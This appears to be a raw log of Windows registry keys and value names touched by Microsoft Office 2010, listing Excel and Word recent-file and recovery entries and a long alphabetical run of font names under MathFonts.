HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\33717
33717
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\33801
33801
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3383F
3383F
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\33801
33801
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
74$
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
o5$
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://z2.ink/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
iz$
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\2F3D1
2F3D1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
